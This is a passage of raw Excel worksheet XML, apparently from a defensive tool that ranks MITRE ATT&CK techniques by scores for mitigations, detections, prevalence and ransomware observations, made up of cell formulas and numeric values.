      <c r="F578" s="37">
        <v>0</v>
      </c>
      <c r="G578" s="37">
        <v>1</v>
      </c>
      <c r="H578" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I578" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J578" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K578" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L578" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M578" s="37">
        <v>0</v>
      </c>
      <c r="N578" s="56">
        <v>0</v>
      </c>
      <c r="O578" s="56">
        <v>0</v>
      </c>
      <c r="P578" s="56">
        <v>0</v>
      </c>
      <c r="Q578" s="56">
        <v>1</v>
      </c>
      <c r="R578" s="57"/>
      <c r="S578" s="57">
        <v>0</v>
      </c>
      <c r="T578" s="57"/>
      <c r="U578" s="57">
        <v>0</v>
      </c>
      <c r="V578" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W578" s="37">
        <v>0</v>
      </c>
      <c r="X578" s="37">
        <v>0</v>
      </c>
      <c r="Y578" s="37">
        <v>0</v>
      </c>
      <c r="Z578" s="37">
        <v>1</v>
      </c>
      <c r="AA578" s="37">
        <v>0.01</v>
      </c>
      <c r="AB578" s="37">
        <v>0.01</v>
      </c>
      <c r="AC578" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD578" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE578" s="37" t="str" cm="1">
        <f t="array" ref="AE578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF578" s="37">
        <v>574</v>
      </c>
      <c r="AG578" s="37" t="str" cm="1">
        <f t="array" ref="AG578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH578" s="37">
        <v>574</v>
      </c>
      <c r="AI578" s="37" t="str" cm="1">
        <f t="array" ref="AI578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD578)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ578" s="37">
        <v>574</v>
      </c>
      <c r="AK578" s="37" t="str" cm="1">
        <f t="array" ref="AK578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL578" s="37">
        <v>574</v>
      </c>
      <c r="AM578" s="37" t="str" cm="1">
        <f t="array" ref="AM578">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD578)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN578" s="37">
        <v>0</v>
      </c>
      <c r="AO578" s="37">
        <v>0</v>
      </c>
      <c r="AP578" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ578" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>41.929365079365077</v>
      </c>
      <c r="AR578" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS578" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT578" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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79" spans="1:47" ht="34">
      <c r="A579" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B579" s="37">
        <f t="shared" si="8"/>
        <v>158.87900971428573</v>
      </c>
      <c r="C579" s="37" t="s">
        <v>1910</v>
      </c>
      <c r="D579" s="50" t="s">
        <v>1911</v>
      </c>
      <c r="E579" s="37"/>
      <c r="F579" s="37">
        <v>0</v>
      </c>
      <c r="G579" s="37">
        <v>1</v>
      </c>
      <c r="H579" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I579" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J579" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K579" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L579" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M579" s="37">
        <v>0</v>
      </c>
      <c r="N579" s="56">
        <v>0</v>
      </c>
      <c r="O579" s="56">
        <v>0</v>
      </c>
      <c r="P579" s="56">
        <v>0</v>
      </c>
      <c r="Q579" s="56">
        <v>0</v>
      </c>
      <c r="R579" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S579" s="57">
        <v>2</v>
      </c>
      <c r="T579" s="57"/>
      <c r="U579" s="57">
        <v>0</v>
      </c>
      <c r="V579" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W579" s="37">
        <v>2</v>
      </c>
      <c r="X579" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y579" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z579" s="37">
        <v>0</v>
      </c>
      <c r="AA579" s="37">
        <v>0</v>
      </c>
      <c r="AB579" s="37">
        <v>0</v>
      </c>
      <c r="AC579" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD579" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE579" s="37" t="str" cm="1">
        <f t="array" ref="AE579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF579" s="37">
        <v>575</v>
      </c>
      <c r="AG579" s="37" t="str" cm="1">
        <f t="array" ref="AG579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD579)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH579" s="37">
        <v>575</v>
      </c>
      <c r="AI579" s="37" t="str" cm="1">
        <f t="array" ref="AI579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ579" s="37">
        <v>575</v>
      </c>
      <c r="AK579" s="37" t="str" cm="1">
        <f t="array" ref="AK579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL579" s="37">
        <v>575</v>
      </c>
      <c r="AM579" s="37" t="str" cm="1">
        <f t="array" ref="AM579">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD579)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN579" s="37">
        <v>0</v>
      </c>
      <c r="AO579" s="37">
        <v>0</v>
      </c>
      <c r="AP579" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ579" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>52.95966990476191</v>
      </c>
      <c r="AR579" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS579" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT579" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU57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80" spans="1:47" ht="17">
      <c r="A580" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B580" s="37">
        <f t="shared" si="8"/>
        <v>170.13139142857142</v>
      </c>
      <c r="C580" s="37" t="s">
        <v>1912</v>
      </c>
      <c r="D580" s="50" t="s">
        <v>1911</v>
      </c>
      <c r="E580" s="37" t="s">
        <v>1913</v>
      </c>
      <c r="F580" s="37">
        <v>0</v>
      </c>
      <c r="G580" s="37">
        <v>1</v>
      </c>
      <c r="H580" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I580" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J580" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K580" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L580" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M580" s="37">
        <v>0</v>
      </c>
      <c r="N580" s="56">
        <v>0</v>
      </c>
      <c r="O580" s="56">
        <v>1</v>
      </c>
      <c r="P580" s="56">
        <v>0</v>
      </c>
      <c r="Q580" s="56">
        <v>0</v>
      </c>
      <c r="R580" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S580" s="57">
        <v>2</v>
      </c>
      <c r="T580" s="57"/>
      <c r="U580" s="57">
        <v>0</v>
      </c>
      <c r="V580" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809714285714288E-2</v>
      </c>
      <c r="W580" s="37">
        <v>2</v>
      </c>
      <c r="X580" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y580" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z580" s="37">
        <v>1</v>
      </c>
      <c r="AA580" s="37">
        <v>0.01</v>
      </c>
      <c r="AB580" s="37">
        <v>0.01</v>
      </c>
      <c r="AC580" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD580" s="50" t="s">
        <v>1690</v>
      </c>
      <c r="AE580" s="37" t="str" cm="1">
        <f t="array" ref="AE580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF580" s="37">
        <v>576</v>
      </c>
      <c r="AG580" s="37" t="str" cm="1">
        <f t="array" ref="AG580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD580)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH580" s="37">
        <v>576</v>
      </c>
      <c r="AI580" s="37" t="str" cm="1">
        <f t="array" ref="AI580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ580" s="37">
        <v>576</v>
      </c>
      <c r="AK580" s="37" t="str" cm="1">
        <f t="array" ref="AK580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL580" s="37">
        <v>576</v>
      </c>
      <c r="AM580" s="37" t="str" cm="1">
        <f t="array" ref="AM580">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD580)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN580" s="37">
        <v>0</v>
      </c>
      <c r="AO580" s="37">
        <v>0</v>
      </c>
      <c r="AP580" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ580" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>56.710463809523809</v>
      </c>
      <c r="AR580" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS580" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT580" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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81" spans="1:47" ht="34">
      <c r="A581" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B581" s="37">
        <f t="shared" ref="B581:B641" si="9">SUM(H581,M581,V581)*(1+SUM(AF581,AH581,AJ581,AL581,AN581))</f>
        <v>159.4313921904762</v>
      </c>
      <c r="C581" s="37" t="s">
        <v>1914</v>
      </c>
      <c r="D581" s="50" t="s">
        <v>1911</v>
      </c>
      <c r="E581" s="37" t="s">
        <v>1915</v>
      </c>
      <c r="F581" s="37">
        <v>0</v>
      </c>
      <c r="G581" s="37">
        <v>1</v>
      </c>
      <c r="H581" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I581" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J581" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K581" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L581" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M581" s="37">
        <v>0</v>
      </c>
      <c r="N581" s="56">
        <v>0</v>
      </c>
      <c r="O581" s="56">
        <v>0</v>
      </c>
      <c r="P581" s="56">
        <v>0</v>
      </c>
      <c r="Q581" s="56">
        <v>0</v>
      </c>
      <c r="R581" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S581" s="57">
        <v>2</v>
      </c>
      <c r="T581" s="57"/>
      <c r="U581" s="57">
        <v>0</v>
      </c>
      <c r="V581" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W581" s="37">
        <v>2</v>
      </c>
      <c r="X581" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y581" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z581" s="37">
        <v>0</v>
      </c>
      <c r="AA581" s="37">
        <v>0</v>
      </c>
      <c r="AB581" s="37">
        <v>0</v>
      </c>
      <c r="AC581" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD581" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE581" s="37" t="str" cm="1">
        <f t="array" ref="AE581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF581" s="37">
        <v>577</v>
      </c>
      <c r="AG581" s="37" t="str" cm="1">
        <f t="array" ref="AG581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD581)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH581" s="37">
        <v>577</v>
      </c>
      <c r="AI581" s="37" t="str" cm="1">
        <f t="array" ref="AI581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ581" s="37">
        <v>577</v>
      </c>
      <c r="AK581" s="37" t="str" cm="1">
        <f t="array" ref="AK581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL581" s="37">
        <v>577</v>
      </c>
      <c r="AM581" s="37" t="str" cm="1">
        <f t="array" ref="AM581">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD581)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN581" s="37">
        <v>0</v>
      </c>
      <c r="AO581" s="37">
        <v>0</v>
      </c>
      <c r="AP581" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ581" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>53.143797396825398</v>
      </c>
      <c r="AR581" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS581" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT581" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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82" spans="1:47" ht="17">
      <c r="A582" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B582" s="37">
        <f t="shared" si="9"/>
        <v>231.3</v>
      </c>
      <c r="C582" s="37" t="s">
        <v>3821</v>
      </c>
      <c r="D582" s="50" t="s">
        <v>1911</v>
      </c>
      <c r="E582" s="37" t="s">
        <v>3822</v>
      </c>
      <c r="F582" s="37">
        <v>1</v>
      </c>
      <c r="G582" s="37">
        <v>1</v>
      </c>
      <c r="H582" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I582" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J582" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K582" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L582" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M582" s="37">
        <v>0</v>
      </c>
      <c r="N582" s="56">
        <v>0</v>
      </c>
      <c r="O582" s="56">
        <v>0</v>
      </c>
      <c r="P582" s="56">
        <v>0</v>
      </c>
      <c r="Q582" s="56">
        <v>0</v>
      </c>
      <c r="R582" s="57"/>
      <c r="S582" s="57"/>
      <c r="T582" s="57"/>
      <c r="U582" s="57"/>
      <c r="V582" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W582" s="37"/>
      <c r="X582" s="37"/>
      <c r="Y582" s="37"/>
      <c r="Z582" s="37"/>
      <c r="AA582" s="37"/>
      <c r="AB582" s="37"/>
      <c r="AC582" s="37"/>
      <c r="AD582" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE582" s="37" t="str" cm="1">
        <f t="array" ref="AE582">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD582)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF582" s="37">
        <v>578</v>
      </c>
      <c r="AG582" s="37" t="str" cm="1">
        <f t="array" ref="AG582">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD582)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH582" s="37">
        <v>578</v>
      </c>
      <c r="AI582" s="37" t="str" cm="1">
        <f t="array" ref="AI582">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD582)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ582" s="37">
        <v>578</v>
      </c>
      <c r="AK582" s="37" t="str" cm="1">
        <f t="array" ref="AK582">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD582)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL582" s="37">
        <v>578</v>
      </c>
      <c r="AM582" s="37" t="str" cm="1">
        <f t="array" ref="AM582">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD582)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN582" s="37"/>
      <c r="AO582" s="37"/>
      <c r="AP582" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ582" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>77.100000000000009</v>
      </c>
      <c r="AR582" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS582" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT582" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU58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83" spans="1:47" ht="34">
      <c r="A583" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B583" s="37">
        <f t="shared" si="9"/>
        <v>115.85000000000001</v>
      </c>
      <c r="C583" s="37" t="s">
        <v>1916</v>
      </c>
      <c r="D583" s="50" t="s">
        <v>1917</v>
      </c>
      <c r="E583" s="37"/>
      <c r="F583" s="37">
        <v>0</v>
      </c>
      <c r="G583" s="37">
        <v>1</v>
      </c>
      <c r="H583" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I583" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J583" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K583" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L583" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M583" s="37">
        <v>0</v>
      </c>
      <c r="N583" s="56">
        <v>0</v>
      </c>
      <c r="O583" s="56">
        <v>0</v>
      </c>
      <c r="P583" s="56">
        <v>0</v>
      </c>
      <c r="Q583" s="56">
        <v>0</v>
      </c>
      <c r="R583" s="57"/>
      <c r="S583" s="57">
        <v>0</v>
      </c>
      <c r="T583" s="57"/>
      <c r="U583" s="57">
        <v>0</v>
      </c>
      <c r="V583" s="37">
